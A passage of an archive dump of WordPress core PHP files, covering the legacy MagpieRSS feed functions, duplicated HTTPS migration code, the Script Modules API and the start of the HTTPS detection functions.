if ( isset($item['content']['encoded'] ) )
$item['atom_content'] = $item['content']['encoded'];
$this->items[$i] = $item;
}
}
}
function is_rss () {
if ( $this->feed_type == RSS ) {
return $this->feed_version;
}
else {
return false;
}
}
function is_atom() {
if ( $this->feed_type == ATOM ) {
return $this->feed_version;
}
else {
return false;
}
}
function map_attrs($k, $v) {
return "$k=\"$v\"";
}
function error( $errormsg, $lvl = E_USER_WARNING ) {
if ( MAGPIE_DEBUG ) {
wp_trigger_error('', $errormsg, $lvl);
} else {
error_log( $errormsg, 0);
}
}
}
if ( !function_exists('fetch_rss') ) :
/**
* Build Magpie object based on RSS from URL.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL to retrieve feed.
* @return MagpieRSS|false MagpieRSS object on success, false on failure.
*/
function fetch_rss ($url) {
// initialize constants
init();
if ( !isset($url) ) {
// error("fetch_rss called without a url");
return false;
}
// if cache is disabled
if ( !MAGPIE_CACHE_ON ) {
// fetch file, and parse it
$resp = _fetch_remote_file( $url );
if ( is_success( $resp->status ) ) {
return _response_to_rss( $resp );
}
else {
// error("Failed to fetch $url and cache is off");
return false;
}
}
// else cache is ON
else {
// Flow
// 1. check cache
// 2. if there is a hit, make sure it's fresh
// 3. if cached obj fails freshness check, fetch remote
// 4. if remote fails, return stale object, or error
$cache = new RSSCache( MAGPIE_CACHE_DIR, MAGPIE_CACHE_AGE );
if (MAGPIE_DEBUG and $cache->ERROR) {
debug($cache->ERROR, E_USER_WARNING);
}
$cache_status = 0; // response of check_cache
$request_headers = array(); // HTTP headers to send with fetch
$rss = 0; // parsed RSS object
$errormsg = 0; // errors, if any
if (!$cache->ERROR) {
// return cache HIT, MISS, or STALE
$cache_status = $cache->check_cache( $url );
}
// if object cached, and cache is fresh, return cached obj
if ( $cache_status == 'HIT' ) {
$rss = $cache->get( $url );
if ( isset($rss) and $rss ) {
$rss->from_cache = 1;
if ( MAGPIE_DEBUG > 1) {
debug("MagpieRSS: Cache HIT", E_USER_NOTICE);
}
return $rss;
}
}
// else attempt a conditional get
// set up headers
if ( $cache_status == 'STALE' ) {
$rss = $cache->get( $url );
if ( isset($rss->etag) and $rss->last_modified ) {
$request_headers['If-None-Match'] = $rss->etag;
$request_headers['If-Last-Modified'] = $rss->last_modified;
}
}
$resp = _fetch_remote_file( $url, $request_headers );
if (isset($resp) and $resp) {
if ($resp->status == '304' ) {
// we have the most current copy
if ( MAGPIE_DEBUG > 1) {
debug("Got 304 for $url");
}
// reset cache on 304 (at minutillo insistent prodding)
$cache->set($url, $rss);
return $rss;
}
elseif ( is_success( $resp->status ) ) {
$rss = _response_to_rss( $resp );
if ( $rss ) {
if (MAGPIE_DEBUG > 1) {
debug("Fetch successful");
}
// add object to cache
$cache->set( $url, $rss );
return $rss;
}
}
else {
$errormsg = "Failed to fetch $url. ";
if ( $resp->error ) {
# compensate for Snoopy's annoying habit to tacking
# on '\n'
$http_error = substr($resp->error, 0, -2);
$errormsg .= "(HTTP Error: $http_error)";
}
else {
$errormsg .= "(HTTP Response: " . $resp->response_code .')';
}
}
}
else {
$errormsg = "Unable to retrieve RSS file for unknown reasons.";
}
// else fetch failed
// attempt to return cached object
if ($rss) {
if ( MAGPIE_DEBUG ) {
debug("Returning STALE object for $url");
}
return $rss;
}
// else we totally failed
// error( $errormsg );
return false;
} // end if ( !MAGPIE_CACHE_ON ) {
} // end fetch_rss()
endif;
/**
* Retrieve URL headers and content using WP HTTP Request API.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL to retrieve
* @param array $headers Optional. Headers to send to the URL. Default empty string.
* @return Snoopy style response
*/
function _fetch_remote_file($url, $headers = "" ) {
$resp = wp_safe_remote_request( $url, array( 'headers' => $headers, 'timeout' => MAGPIE_FETCH_TIME_OUT ) );
if ( is_wp_error($resp) ) {
$error = array_shift($resp->errors);
$resp = new stdClass;
$resp->status = 500;
$resp->response_code = 500;
$resp->error = $error[0] . "\n"; //\n = Snoopy compatibility
return $resp;
}
// Snoopy returns headers unprocessed.
// Also note, WP_HTTP lowercases all keys, Snoopy did not.
$return_headers = array();
foreach ( wp_remote_retrieve_headers( $resp ) as $key => $value ) {
if ( !is_array($value) ) {
$return_headers[] = "$key: $value";
} else {
foreach ( $value as $v )
$return_headers[] = "$key: $v";
}
}
$response = new stdClass;
$response->status = wp_remote_retrieve_response_code( $resp );
$response->response_code = wp_remote_retrieve_response_code( $resp );
$response->headers = $return_headers;
$response->results = wp_remote_retrieve_body( $resp );
return $response;
}
/**
* Retrieve
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param array $resp
* @return MagpieRSS|bool
*/
function _response_to_rss ($resp) {
$rss = new MagpieRSS( $resp->results );
// if RSS parsed successfully
if ( $rss && (!isset($rss->ERROR) || !$rss->ERROR) ) {
// find Etag, and Last-Modified
foreach ( (array) $resp->headers as $h) {
// 2003-03-02 - Nicola Asuni (www.tecnick.com) - fixed bug "Undefined offset: 1"
if (strpos($h, ": ")) {
list($field, $val) = explode(": ", $h, 2);
}
else {
$field = $h;
$val = "";
}
if ( $field == 'etag' ) {
$rss->etag = $val;
}
if ( $field == 'last-modified' ) {
$rss->last_modified = $val;
}
}
return $rss;
} // else construct error message
else {
$errormsg = "Failed to parse RSS file.";
if ($rss) {
$errormsg .= " (" . $rss->ERROR . ")";
}
// error($errormsg);
return false;
} // end if ($rss and !$rss->error)
}
/**
* Set up constants with default values, unless user overrides.
*
* @since 1.5.0
*
* @global string $wp_version The WordPress version string.
*
* @package External
* @subpackage MagpieRSS
*/
function init () {
if ( defined('MAGPIE_INITALIZED') ) {
return;
}
else {
define('MAGPIE_INITALIZED', 1);
}
if ( !defined('MAGPIE_CACHE_ON') ) {
define('MAGPIE_CACHE_ON', 1);
}
if ( !defined('MAGPIE_CACHE_DIR') ) {
define('MAGPIE_CACHE_DIR', './cache');
}
if ( !defined('MAGPIE_CACHE_AGE') ) {
define('MAGPIE_CACHE_AGE', 60*60); // one hour
}
if ( !defined('MAGPIE_CACHE_FRESH_ONLY') ) {
define('MAGPIE_CACHE_FRESH_ONLY', 0);
}
if ( !defined('MAGPIE_DEBUG') ) {
define('MAGPIE_DEBUG', 0);
}
if ( !defined('MAGPIE_USER_AGENT') ) {
$ua = 'WordPress/' . $GLOBALS['wp_version'];
if ( MAGPIE_CACHE_ON ) {
$ua = $ua . ')';
}
else {
$ua = $ua . '; No cache)';
}
define('MAGPIE_USER_AGENT', $ua);
}
if ( !defined('MAGPIE_FETCH_TIME_OUT') ) {
define('MAGPIE_FETCH_TIME_OUT', 2); // 2 second timeout
}
// use gzip encoding to fetch rss files if supported?
if ( !defined('MAGPIE_USE_GZIP') ) {
define('MAGPIE_USE_GZIP', true);
}
}
function is_info ($sc) {
return $sc >= 100 && $sc < 200;
}
function is_success ($sc) {
return $sc >= 200 && $sc < 300;
}
function is_redirect ($sc) {
return $sc >= 300 && $sc < 400;
}
function is_error ($sc) {
return $sc >= 400 && $sc < 600;
}
function is_client_error ($sc) {
return $sc >= 400 && $sc < 500;
}
function is_server_error ($sc) {
return $sc >= 500 && $sc < 600;
}
class RSSCache {
var $BASE_CACHE; // where the cache files are stored
var $MAX_AGE = 43200; // when are files stale, default twelve hours
var $ERROR = ''; // accumulate error messages
/**
* PHP5 constructor.
*/
function __construct( $base = '', $age = '' ) {
$this->BASE_CACHE = WP_CONTENT_DIR . '/cache';
if ( $base ) {
$this->BASE_CACHE = $base;
}
if ( $age ) {
$this->MAX_AGE = $age;
}
}
/**
* PHP4 constructor.
*/
public function RSSCache( $base = '', $age = '' ) {
self::__construct( $base, $age );
}
/*=======================================================================*\
Function: set
Purpose: add an item to the cache, keyed on url
Input: url from which the rss file was fetched
Output: true on success
\*=======================================================================*/
function set ($url, $rss) {
$cache_option = 'rss_' . $this->file_name( $url );
set_transient($cache_option, $rss, $this->MAX_AGE);
return $cache_option;
}
/*=======================================================================*\
Function: get
Purpose: fetch an item from the cache
Input: url from which the rss file was fetched
Output: cached object on HIT, false on MISS
\*=======================================================================*/
function get ($url) {
$this->ERROR = "";
$cache_option = 'rss_' . $this->file_name( $url );
if ( ! $rss = get_transient( $cache_option ) ) {
$this->debug(
"Cache does not contain: $url (cache option: $cache_option)"
);
return 0;
}
return $rss;
}
/*=======================================================================*\
Function: check_cache
Purpose: check a url for membership in the cache
and whether the object is older then MAX_AGE (ie. STALE)
Input: url from which the rss file was fetched
Output: cached object on HIT, false on MISS
\*=======================================================================*/
function check_cache ( $url ) {
$this->ERROR = "";
$cache_option = 'rss_' . $this->file_name( $url );
if ( get_transient($cache_option) ) {
// object exists and is current
return 'HIT';
} else {
// object does not exist
return 'MISS';
}
}
/*=======================================================================*\
Function: serialize
\*=======================================================================*/
function serialize ( $rss ) {
return serialize( $rss );
}
/*=======================================================================*\
Function: unserialize
\*=======================================================================*/
function unserialize ( $data ) {
return unserialize( $data );
}
/*=======================================================================*\
Function: file_name
Purpose: map url to location in cache
Input: url from which the rss file was fetched
Output: a file name
\*=======================================================================*/
function file_name ($url) {
return md5( $url );
}
/*=======================================================================*\
Function: error
Purpose: register error
\*=======================================================================*/
function error ($errormsg, $lvl=E_USER_WARNING) {
$this->ERROR = $errormsg;
if ( MAGPIE_DEBUG ) {
wp_trigger_error( '', $errormsg, $lvl);
}
else {
error_log( $errormsg, 0);
}
}
function debug ($debugmsg, $lvl=E_USER_NOTICE) {
if ( MAGPIE_DEBUG ) {
$this->error("MagpieRSS [debug] $debugmsg", $lvl);
}
}
}
if ( !function_exists('parse_w3cdtf') ) :
function parse_w3cdtf ( $date_str ) {
# regex to match W3C date/time formats
$pat = "/(\d{4})-(\d{2})-(\d{2})T(\d{2}):(\d{2})(:(\d{2}))?(?:([-+])(\d{2}):?(\d{2})|(Z))?/";
if ( preg_match( $pat, $date_str, $match ) ) {
list( $year, $month, $day, $hours, $minutes, $seconds) =
array( $match[1], $match[2], $match[3], $match[4], $match[5], $match[7]);
# calc epoch for current date assuming GMT
$epoch = gmmktime( $hours, $minutes, $seconds, $month, $day, $year);
$offset = 0;
if ( $match[11] == 'Z' ) {
# zulu time, aka GMT
}
else {
list( $tz_mod, $tz_hour, $tz_min ) =
array( $match[8], $match[9], $match[10]);
# zero out the variables
if ( ! $tz_hour ) { $tz_hour = 0; }
if ( ! $tz_min ) { $tz_min = 0; }
$offset_secs = (($tz_hour*60)+$tz_min)*60;
# is timezone ahead of GMT? then subtract offset
#
if ( $tz_mod == '+' ) {
$offset_secs = $offset_secs * -1;
}
$offset = $offset_secs;
}
$epoch = $epoch + $offset;
return $epoch;
}
else {
return -1;
}
}
endif;
if ( !function_exists('wp_rss') ) :
/**
* Display all RSS items in a HTML ordered list.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL of feed to display. Will not auto sense feed URL.
* @param int $num_items Optional. Number of items to display, default is all.
*/
function wp_rss( $url, $num_items = -1 ) {
if ( $rss = fetch_rss( $url ) ) {
echo '<ul>';
if ( $num_items !== -1 ) {
$rss->items = array_slice( $rss->items, 0, $num_items );
}
foreach ( (array) $rss->items as $item ) {
printf(
'<li><a href="%1$s" title="%2$s">%3$s</a></li>',
esc_url( $item['link'] ),
esc_attr( strip_tags( $item['description'] ) ),
esc_html( $item['title'] )
);
}
echo '</ul>';
} else {
_e( 'An error has occurred, which probably means the feed is down. Try again later.' );
}
}
endif;
if ( !function_exists('get_rss') ) :
/**
* Display RSS items in HTML list items.
*
* You have to specify which HTML list you want, either ordered or unordered
* before using the function. You also have to specify how many items you wish
* to display. You can't display all of them like you can with wp_rss()
* function.
*
* @since 1.5.0
* @package External
* @subpackage MagpieRSS
*
* @param string $url URL of feed to display. Will not auto sense feed URL.
* @param int $num_items Optional. Number of items to display, default is all.
* @return bool False on failure.
*/
function get_rss ($url, $num_items = 5) { // Like get posts, but for RSS
$rss = fetch_rss($url);
if ( $rss ) {
$rss->items = array_slice($rss->items, 0, $num_items);
foreach ( (array) $rss->items as $item ) {
echo "<li>\n";
echo "<a href='$item[link]' title='$item[description]'>";
echo esc_html($item['title']);
echo "</a><br />\n";
echo "</li>\n";
}
} else {
return false;
}
}
endif;
https-migration-20260605202835-20260621081103.php 0000666 00000011205 15224151220 0013346 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260606074155-20260621081105.php 0000666 00000011205 15224151220 0013353 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
script-modules-20260605020157-20260621142642.php 0000666 00000023267 15224151220 0013203 0 ustar 00 <?php
/**
* Script Modules API: Script Module functions
*
* @since 6.5.0
*
* @package WordPress
* @subpackage Script Modules
*/
/**
* Retrieves the main WP_Script_Modules instance.
*
* This function provides access to the WP_Script_Modules instance, creating one
* if it doesn't exist yet.
*
* @since 6.5.0
*
* @global WP_Script_Modules $wp_script_modules
*
* @return WP_Script_Modules The main WP_Script_Modules instance.
*/
function wp_script_modules(): WP_Script_Modules {
global $wp_script_modules;
if ( ! ( $wp_script_modules instanceof WP_Script_Modules ) ) {
$wp_script_modules = new WP_Script_Modules();
}
return $wp_script_modules;
}
/**
* Registers the script module if no script module with that script module
* identifier has already been registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_register_script_module( string $id, string $src, array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->register( $id, $src, $deps, $version, $args );
}
/**
* Marks the script module to be enqueued in the page.
*
* If a src is provided and the script module has not been registered yet, it
* will be registered.
*
* @since 6.5.0
* @since 6.9.0 Added the $args parameter.
*
* @param string $id The identifier of the script module. Should be unique. It will be used in the
* final import map.
* @param string $src Optional. Full URL of the script module, or path of the script module relative
* to the WordPress root directory. If it is provided and the script module has
* not been registered yet, it will be registered.
* @param array $deps {
* Optional. List of dependencies.
*
* @type string|array ...$0 {
* An array of script module identifiers of the dependencies of this script
* module. The dependencies can be strings or arrays. If they are arrays,
* they need an `id` key with the script module identifier, and can contain
* an `import` key with either `static` or `dynamic`. By default,
* dependencies that don't contain an `import` key are considered static.
*
* @type string $id The script module identifier.
* @type string $import Optional. Import type. May be either `static` or
* `dynamic`. Defaults to `static`.
* }
* }
* @param string|false|null $version Optional. String specifying the script module version number. Defaults to false.
* It is added to the URL as a query string for cache busting purposes. If $version
* is set to false, the version number is the currently installed WordPress version.
* If $version is set to null, no version is added.
* @param array $args {
* Optional. An array of additional args. Default empty array.
*
* @type bool $in_footer Whether to print the script module in the footer. Only relevant to block themes. Default 'false'. Optional.
* @type 'auto'|'low'|'high' $fetchpriority Fetch priority. Default 'auto'. Optional.
* }
*/
function wp_enqueue_script_module( string $id, string $src = '', array $deps = array(), $version = false, array $args = array() ) {
wp_script_modules()->enqueue( $id, $src, $deps, $version, $args );
}
/**
* Unmarks the script module so it is no longer enqueued in the page.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_dequeue_script_module( string $id ) {
wp_script_modules()->dequeue( $id );
}
/**
* Deregisters the script module.
*
* @since 6.5.0
*
* @param string $id The identifier of the script module.
*/
function wp_deregister_script_module( string $id ) {
wp_script_modules()->deregister( $id );
}
/**
* Registers all the default WordPress Script Modules.
*
* @since 6.7.0
*/
function wp_default_script_modules() {
$suffix = defined( 'WP_RUN_CORE_TESTS' ) ? '.min' : wp_scripts_get_suffix();
/*
* Expects multidimensional array like:
*
* 'interactivity/index.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity/debug.min.js' => array('dependencies' => array(…), 'version' => '…'),
* 'interactivity-router/index.min.js' => …
*/
$assets = include ABSPATH . WPINC . "/assets/script-modules-packages{$suffix}.php";
foreach ( $assets as $file_name => $script_module_data ) {
/*
* Build the WordPress Script Module ID from the file name.
* Prepend `@wordpress/` and remove extensions and `/index` if present:
* - interactivity/index.min.js => @wordpress/interactivity
* - interactivity/debug.min.js => @wordpress/interactivity/debug
* - block-library/query/view.js => @wordpress/block-library/query/view
*/
$script_module_id = '@wordpress/' . preg_replace( '~(?:/index)?(?:\.min)?\.js$~D', '', $file_name, 1 );
switch ( $script_module_id ) {
/*
* Interactivity exposes two entrypoints, "/index" and "/debug".
* "/debug" should replace "/index" in development.
*/
case '@wordpress/interactivity/debug':
if ( ! SCRIPT_DEBUG ) {
continue 2;
}
$script_module_id = '@wordpress/interactivity';
break;
case '@wordpress/interactivity':
if ( SCRIPT_DEBUG ) {
continue 2;
}
break;
}
/*
* The Interactivity API is designed with server-side rendering as its primary goal, so all of its script modules
* should be loaded with low fetchpriority and printed in the footer since they should not be needed in the
* critical rendering path. Also, the @wordpress/a11y script module is intended to be used as a dynamic import
* dependency, in which case the fetchpriority is irrelevant. See <https://make.wordpress.org/core/2024/10/14/updates-to-script-modules-in-6-7/>.
* However, in case it is added as a static import dependency, the fetchpriority is explicitly set to be 'low'
* since the module should not be involved in the critical rendering path, and if it is, its fetchpriority will
* be bumped to match the fetchpriority of the dependent script.
*/
$args = array();
if (
str_starts_with( $script_module_id, '@wordpress/interactivity' ) ||
str_starts_with( $script_module_id, '@wordpress/block-library' ) ||
'@wordpress/a11y' === $script_module_id
) {
$args['fetchpriority'] = 'low';
$args['in_footer'] = true;
}
// Marks all Core blocks as compatible with client-side navigation.
if ( str_starts_with( $script_module_id, '@wordpress/block-library' ) ) {
wp_interactivity()->add_client_navigation_support_to_script_module( $script_module_id );
}
$path = includes_url( "js/dist/script-modules/{$file_name}" );
wp_register_script_module( $script_module_id, $path, $script_module_data['dependencies'], $script_module_data['version'], $args );
}
}
https-detection-20260605114255.php 0000666 00000013341 15224151220 0011757 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
